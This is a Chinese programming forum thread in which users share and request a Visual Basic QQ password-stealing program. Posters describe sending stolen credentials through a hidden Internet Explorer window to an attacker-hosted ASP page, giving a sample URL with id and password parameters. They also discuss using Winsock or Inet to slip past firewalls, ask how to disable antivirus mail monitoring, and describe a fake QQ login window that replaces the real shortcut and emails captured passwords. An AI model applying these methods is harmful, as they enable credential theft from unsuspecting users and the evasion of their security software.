| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   

密 码:  
共有 4608 人关注过本帖
标题:[分享]VB打造的QQ盗号软件(未完成)
只看楼主 加入收藏
multiple19O2
等 级:新手上路
帖 子:326
专家分:0
注 册:2007-8-29
得分:0 
以下是引用121038在2007-8-29 21:16:35的发言:
要逃脱防火墙都是很简单的事。

1.首先要明白一些ASP知识,自己编个ASP。用来上传密码数据。如编好之后这个ASP的名称是ccc.ASP,用来接收帐号的参数是A,密码参数是B。
2.然后把ASP传到自己的网站上(要干坏事建议用免费的,哈哈)。比如www.abc.com
3.要上传密码时,只需用隐藏方式打开IE,然后指向这个ASP:http://www.abc.com/ccc.asp?a=id&b=password

一般的防火墙把IE都设为了白名单,不会阻止。

呵呵 这个思路好 后台开IE

我一般的思路是用Inet等直接访问asp

注意 如果用CreateObject IE.Application的话,如果开了Maxthon开启了拦截调用会被拦截进Maxthon

swt
帖 子:59
注 册:2006-1-8
用Winsock

我不想玷污这洁白的地方,所以签名就签在心里好了。
zfc123
等 级:论坛游民
帖 子:136
专家分:39
注 册:2007-5-4
我有一个完成的,有需要的可以和我联系,使用winsock发送,只是开瑞星邮件监控无法发送,不知道有没有关闭瑞星邮件监控的方法。
tandingfu
帖 子:2
注 册:2008-3-6
顶一下
呵呵....免杀的哟....
cba817
帖 子:95
专家分:10
注 册:2008-3-24
回复 13# 的帖子
我想要一个!
原因是我想了了解一下我的号为什么总有人盗取~~~
cba817
帖 子:95
专家分:10
注 册:2008-3-24
79915974@
zfc123
帖 子:136
专家分:39
注 册:2007-5-4
回复 16# 的帖子
恐怕我的程序不能让你了解QQ号是怎么盗的,因为我也不知道,我只是做了个QQ界面,替换快捷方式为我的程序,然后把获取的密码发到邮箱,很简单的
热波
帖 子:1
注 册:2010-11-24
强悍,就是2006版的不好
快速回复:[分享]VB打造的QQ盗号软件(未完成)
数据加载中...

关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。